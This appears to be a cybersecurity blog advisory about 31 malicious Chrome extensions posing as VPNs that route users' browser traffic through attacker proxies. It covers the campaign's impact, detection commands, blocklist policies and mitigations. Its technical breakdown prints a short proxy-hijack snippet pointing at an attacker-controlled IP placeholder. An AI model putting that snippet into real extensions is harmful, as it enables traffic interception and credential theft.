Fake VPN Extensions Hijack 356K Users’ Browser Traffic

Malicious Chrome Extensions Masquerade as VPNs to Hijack Browser Traffic

A coordinated malware campaign involving 31 Chrome extensions disguised as legitimate VPN services has infected approximately 356,000 users. These Russian-language extensions secretly redirect all browser traffic through attacker-controlled proxy servers, enabling traffic interception, credential theft, and data exfiltration. The extensions remain active in victims’ browsers despite detection, requiring immediate removal and security assessment for affected organizations.

Introduction

Browser extensions represent one of the most overlooked attack vectors in modern enterprise environments. A newly discovered campaign demonstrates the sophistication of extension-based threats, with attackers deploying 31 malicious Chrome extensions that masquerade as VPN privacy tools while actually routing all browser traffic through attacker-controlled infrastructure.

Unlike traditional malware that requires system-level access, these extensions operate entirely within the browser context, making them difficult to detect with conventional endpoint protection solutions. The campaign’s scale—compromising over 356,000 users—underscores the effectiveness of social engineering tactics that leverage user desires for privacy and security tools.

The malicious extensions specifically target Russian-speaking users, suggesting either a financially motivated operation focused on regional markets or a more sophisticated intelligence-gathering campaign. Regardless of motive, the technical implementation reveals careful planning and understanding of Chrome’s extension architecture.

Background & Context

Browser extensions have evolved from simple productivity tools into powerful applications with extensive permissions over browsing data, network requests, and user credentials. The Chrome Web Store hosts hundreds of thousands of extensions, creating a vast attack surface that threat actors increasingly exploit.

VPN extensions specifically represent attractive targets for malicious impersonation. Users install VPN tools expecting enhanced privacy and security, making them less likely to question network-level changes or performance impacts. This psychological factor provides malicious actors with significant operational advantages.

This campaign follows established patterns seen in previous extension-based attacks. In 2020, a similar campaign compromised over 3 million users through malicious Chrome extensions. The persistence of these threats indicates that current detection and review processes for browser extensions remain inadequate to prevent sophisticated malicious code from reaching end users.

The Russian-language focus suggests several possibilities: targeting specific regional financial systems, cryptocurrency exchange users, or gathering intelligence on specific user populations. The proxy server infrastructure enables attackers to position themselves as perfect man-in-the-middle adversaries.

Technical Breakdown

The malicious extensions implement a sophisticated proxy injection mechanism that operates at the browser level. Upon installation, the extensions request permissions typical of VPN tools, including:

"permissions": [
  "proxy",
  "webRequest",
  "webRequestBlocking",
  "storage",
  ""
]

These permissions allow complete control over network traffic routing and the ability to inspect or modify any HTTP/HTTPS request made through the browser.

The core malicious functionality implements the Chrome Proxy API to redirect all browser traffic through attacker-controlled servers:

chrome.proxy.settings.set({
  value: {
    mode: "fixed_servers",
    rules: {
      singleProxy: {
        host: "[ATTACKER-CONTROLLED-IP]",
        port: [PORT]
      }
    }
  },
  scope: "regular"
});

This configuration forces all browser traffic through the specified proxy server, giving attackers visibility into all unencrypted traffic and the ability to perform SSL stripping attacks against encrypted connections.

The extensions implement additional obfuscation techniques to evade detection. Code analysis reveals:

  • Dynamic code loading from remote servers to bypass static analysis
  • Legitimate VPN UI elements copied from genuine extensions to maintain cover
  • Delayed activation mechanisms that prevent immediate detection after installation
  • Communications with command-and-control infrastructure disguised as analytics requests

The proxy servers themselves operate on distributed infrastructure, making takedown efforts more complex. Network traffic analysis shows connections to IP addresses primarily registered in Russia and Eastern Europe, though some infrastructure spans multiple jurisdictions.

Impact & Risk Assessment

The immediate impact affects 356,000 confirmed installations, though the actual victim count may be higher given limitations in detection methodologies. Organizations face multiple risk vectors from these infections:

Data Exfiltration: All browser traffic passes through attacker-controlled infrastructure, exposing credentials, session tokens, API keys, and sensitive business data. Even HTTPS traffic can be compromised through SSL stripping or certificate injection techniques.

Credential Harvesting: Authentication requests to corporate applications, cloud services, and SaaS platforms transit the malicious proxy, enabling credential theft without triggering traditional phishing detection systems.

Session Hijacking: Active session tokens for authenticated services can be captured and replayed, granting attackers unauthorized access to corporate resources without needing to crack passwords.

Supply Chain Implications: Developers with infected browsers may inadvertently expose source code repositories, CI/CD systems, or cloud infrastructure credentials during normal development workflows.

Financial services, healthcare, and technology sectors face elevated risk due to the high-value targets their employees represent. The Russian-language focus suggests particular interest in Eastern European organizations and their international operations.

The persistence of these extensions—remaining active despite public disclosure—indicates either sophisticated command-and-control mechanisms or a large-scale automated operation that continuously deploys new infrastructure as detection occurs.

Vendor Response

Google has been notified of the malicious extensions but response has been inconsistent. Some extensions have been removed from the Chrome Web Store, preventing new installations, but many remain accessible for download. Critically, removal from the store does not automatically uninstall extensions from affected browsers.

The Chrome security team has implemented additional review processes for extensions requesting proxy permissions, but retroactive enforcement remains limited. Google’s Transparency Report does not yet reflect these extensions in its malware statistics.

Antivirus vendors have begun adding detection signatures for specific extensions, though coverage varies significantly. Major security vendors including Microsoft Defender, Malwarebytes, and ESET now detect several variants, but signature-based detection remains reactive rather than proactive.

Browser security extensions like Malwarebytes Browser Guard and Avast Online Security have added detection capabilities for proxy manipulation, though users must have these protective extensions installed prior to infection for effective prevention.

No formal attribution has been published by security vendors or government agencies, though the infrastructure patterns align with financially motivated cybercrime operations typical of Eastern European threat actors.

Mitigations & Workarounds

Immediate removal of suspicious extensions is critical. Users should audit installed extensions through:

chrome://extensions/

Look for extensions with the following characteristics:

  • Recently installed VPN or privacy tools
  • Russian-language descriptions or developer information
  • Requests for proxy permissions
  • Generic names like “Free VPN” or “Fast VPN”

Complete removal requires:

  • Navigate to chrome://extensions/
  • Enable “Developer mode” to view extension IDs
  • Remove suspicious extensions using the “Remove” button
  • Verify removal by checking chrome://policy/ for persistent policies
  • Clear browser cache and cookies

For enterprise environments, administrators should deploy Chrome policies to blacklist known malicious extension IDs:

{
  "ExtensionInstallBlacklist": [
    "[EXTENSION_ID_1]",
    "[EXTENSION_ID_2]",
    "[EXTENSION_ID_N]"
  ]
}

Network-level mitigations include:

  • Blocking known proxy server IP addresses at the firewall
  • Implementing SSL inspection to detect traffic routing anomalies
  • Requiring corporate VPN usage that supersedes browser-level proxies

Password resets are essential for any credentials entered while extensions were active. Prioritize:

  • Corporate authentication systems
  • Cloud service accounts (AWS, Azure, GCP)
  • Financial service credentials
  • Email and communication platforms

Detection & Monitoring

Organizations should implement multiple detection layers to identify compromised browsers:

Endpoint Detection: Query installed Chrome extensions across the fleet:

find ~/.config/google-chrome/ -name "manifest.json" -exec grep -l "proxy" {} \;

# Windows PowerShell
Get-ChildItem "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions" -Recurse -Filter "manifest.json" | Select-String -Pattern "proxy"

Network Monitoring: Identify proxy traffic patterns through SIEM correlation:

  • Unusual destination IPs for browser traffic
  • Connections to non-standard ports (not 80/443)
  • Multiple users connecting to identical external IPs
  • Traffic patterns inconsistent with direct internet access

Proxy Configuration Audits: Monitor for unauthorized proxy settings:

// Check current proxy configuration
chrome.proxy.settings.get({'incognito': false}, function(config) {
  console.log(JSON.stringify(config));
});

Security teams should establish baselines for legitimate extension usage and alert on deviations. Browser management solutions like Google Chrome Enterprise or third-party tools can provide centralized visibility into extension deployments.

Log sources to monitor:

  • Chrome sync logs for extension installation events
  • DNS queries to suspicious domains
  • HTTP/HTTPS proxy connection attempts
  • Certificate validation failures indicating SSL stripping

Best Practices

Organizations should implement comprehensive browser security policies:

Extension Management:

  • Whitelist-only approach for approved extensions
  • Mandatory security review before extension approval
  • Regular audits of installed extensions across the organization
  • Automated detection of extensions requesting high-risk permissions

User Education:

  • Training on extension risks and approval processes
  • Clear guidelines for VPN usage (corporate-approved solutions only)
  • Reporting mechanisms for suspicious browser behavior
  • Regular security awareness updates covering browser threats

Technical Controls:

  • Implement Chrome Enterprise policies restricting extension installation
  • Deploy endpoint detection capabilities with extension monitoring
  • Enable Chrome’s Enhanced Safe Browsing for advanced threat protection
  • Use managed browser configurations with centralized policy enforcement

Incident Response Preparation:

  • Documented procedures for browser compromise investigations
  • Rapid credential reset capabilities for affected users
  • Communication templates for notifying affected personnel
  • Integration with existing incident response playbooks

Architecture Improvements:

  • Implement zero-trust network access reducing impact of compromised browsers
  • Deploy multi-factor authentication resistant to session hijacking
  • Use hardware security keys for high-value accounts
  • Segment networks to limit lateral movement from browser compromise

Key Takeaways

  • 31 malicious Chrome extensions disguised as VPN tools have compromised 356,000 users by routing browser traffic through attacker-controlled proxies
  • The extensions remain active despite detection, requiring immediate manual removal by affected users
  • All credentials and sensitive data accessed through infected browsers should be considered compromised
  • Organizations must implement extension whitelisting and continuous monitoring to prevent similar infections
  • Browser-based threats bypass traditional endpoint protection, requiring specialized detection capabilities
  • The campaign demonstrates the sophistication of extension-based attacks and the inadequacy of current Chrome Web Store security reviews

References


Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.
📧 Subscribe to our newsletter at https://cydhaal.com/newsletter/


Leave a Reply

Your email address will not be published. Required fields are marked *

💬 Join WhatsApp Channel 📲 Cydhaal App